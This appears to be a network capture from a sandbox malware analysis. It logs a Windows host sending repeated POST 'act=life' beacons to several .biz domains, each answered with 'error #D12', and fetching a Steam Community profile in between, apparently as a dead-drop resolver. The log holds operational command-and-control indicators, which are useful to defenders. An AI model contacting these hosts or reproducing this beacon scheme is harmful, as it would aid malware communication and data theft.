2024-12-14 23:04:04 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Sat, 14 Dec 2024 23:04:04 GMT Content-Length: 35131 Connection: close Set-Cookie: sessionid=196973b24fe7419733ca34b2; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-14 23:04:04 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-14 23:04:04 UTC	16384	IN	Data Raw: 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 Data Ascii: munity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SU
2024-12-14 23:04:04 UTC	3768	IN	Data Raw: 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_per
2024-12-14 23:04:04 UTC	500	IN	Data Raw: 20 53 75 62 73 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 Data Ascii: Subscriber Agreement</a>  \|  <a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.4	50295	104.21.50.161	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 23:04:12 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: tacitglibbr.biz
2024-12-14 23:04:12 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-14 23:04:12 UTC	1015	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 23:04:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5mnehqfefs932dpvjgork29mch; expires=Wed, 09-Apr-2025 16:50:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DQozOOxIbX%2BDUTuaUiYFWcQZhlRcb5115LuE%2FVrGYcfnCQMNFpWwVJ%2FJhBssYMi%2FfvwCNG9x0c6CgbkElv1ygojWdkls7n0CBwLyH2SOhYYVWcOZlf1Av40JefQn%2BcpujLU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f21d4e4ac2143f1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1600&rtt_var=612&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=906&delivery_rate=1771844&cwnd=218&unsent_bytes=0&cid=020efd5d607b4218&ts=764&x=0"
2024-12-14 23:04:12 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-14 23:04:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.4	50297	172.67.207.38	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 23:04:13 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: immureprech.biz
2024-12-14 23:04:13 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-14 23:04:14 UTC	1012	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 23:04:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0r618nspr6foafku0mqejlmpud; expires=Wed, 09-Apr-2025 16:50:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eRg3ZeA5%2F2hdQC5fgm2fPB%2F7GqkYgvafKR7G1c0H0cz3Ieu%2FItMDxthDhpxUFGK44zZWKpMNCe2braJpVc86xS9IUCVhOGbPSKwFoU8tOdMCQSSlv1rUIui74AkonxuSiAQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f21d4f10bad7c9f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1829&min_rtt=1822&rtt_var=699&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=906&delivery_rate=1549071&cwnd=213&unsent_bytes=0&cid=77eaea25ef6155ec&ts=1027&x=0"
2024-12-14 23:04:14 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-14 23:04:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.4	50299	104.21.64.1	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 23:04:16 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: deafeninggeh.biz
2024-12-14 23:04:16 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-14 23:04:16 UTC	1011	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 23:04:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bgen792f9i8qv3skc3g449o7v7; expires=Wed, 09-Apr-2025 16:50:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mL5fv5y6FewNuJjcsKAp%2FRglkw1PEC0kzxrN1EPQLo9WxvrlcLbiLHBejAfQw5xRU2yh4g0%2BBDaMKAYiI%2BfMESpAfemforpOv3hb7pFXUaYU%2Fkvfr1ZTjdyqWeDjmnmrouq1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f21d4ff1995c358-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1634&min_rtt=1620&rtt_var=637&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1679125&cwnd=155&unsent_bytes=0&cid=255131f0f1930bc4&ts=717&x=0"
2024-12-14 23:04:16 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-14 23:04:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.2.4	50302	104.102.49.254	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 23:04:19 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-12-14 23:04:20 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Sat, 14 Dec 2024 23:04:19 GMT Content-Length: 35131 Connection: close Set-Cookie: sessionid=bc4ef82c53f440bb961e48b3; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-14 23:04:20 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-14 23:04:20 UTC	16384	IN	Data Raw: 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 Data Ascii: munity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SU
2024-12-14 23:04:20 UTC	3768	IN	Data Raw: 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_per
2024-12-14 23:04:20 UTC	500	IN	Data Raw: 20 53 75 62 73 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 Data Ascii: Subscriber Agreement</a>  \|  <a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.4	50316	104.21.50.161	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 23:04:46 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: tacitglibbr.biz
2024-12-14 23:04:46 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-14 23:04:47 UTC	1023	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 23:04:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=82ujbn00gbgtid0amt0413o7sf; expires=Wed, 09-Apr-2025 16:51:26 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qq%2B3qLta4lWnHjb%2ByzGCSP3T6tlAo8c7QU25c7jFVk6fGqECa%2Ba93WeBjIVotemIDFO%2FpX%2B2DIJbwvRVoND3NrSol0P872ORp2V%2BUYnWS%2Bbg%2FoiSSNfz1vPF1aKfs8b%2F4sg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f21d5be0e5b5e82-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1611&min_rtt=1600&rtt_var=622&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=906&delivery_rate=1729857&cwnd=216&unsent_bytes=0&cid=8ebe29fe8feeac34&ts=746&x=0"
2024-12-14 23:04:47 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-14 23:04:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.4	50318	172.67.207.38	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 23:04:48 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: immureprech.biz
2024-12-14 23:04:48 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-14 23:04:49 UTC	1011	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 23:04:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rqc0qmer1ukir2oo23uielpf1p; expires=Wed, 09-Apr-2025 16:51:28 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XKoS43x13IFyo8kb1BBgwISB6R1fMYTjv4zCYYU%2Fj09l7snZbPsJ21yVooCtNRTjH9mX5oJOrcQGXadaU1gBgY2cE%2FhLygdJHY6dEmuk9n4O2AIL7JLNpFnULnqY%2BesPhRQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f21d5ca4ac64349-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2040&min_rtt=1659&rtt_var=894&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=906&delivery_rate=1760096&cwnd=227&unsent_bytes=0&cid=696f7ea95a6454be&ts=750&x=0"
2024-12-14 23:04:49 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-14 23:04:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.4	50320	104.21.64.1	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 23:04:50 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: deafeninggeh.biz
2024-12-14 23:04:50 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-14 23:04:51 UTC	1027	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 23:04:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hb2p9peciehg3000dlrcc1p890; expires=Wed, 09-Apr-2025 16:51:30 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jo%2B%2Fjp0UH1Y65QHHm%2B9t3oh30fkBYt4NI0h8%2BiL%2Fcs5dVC6gDb%2FAeRk%2BZRnaUjk4QQ7FPQEJnbU%2Fg4nmsuFI%2FVJi4rfUmoBbW%2BHul%2FRh0BYhyYJY6MI3i5m%2BRuCcDFX01vI4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f21d5d69c4cc358-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1606&rtt_var=621&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1734997&cwnd=155&unsent_bytes=0&cid=7b13587593382f00&ts=756&x=0"
2024-12-14 23:04:51 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-14 23:04:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.4	50322	104.102.49.254	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 23:04:53 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-12-14 23:04:54 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Sat, 14 Dec 2024 23:04:54 GMT Content-Length: 35131 Connection: close Set-Cookie: sessionid=b515666d6fa85562aa696088; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
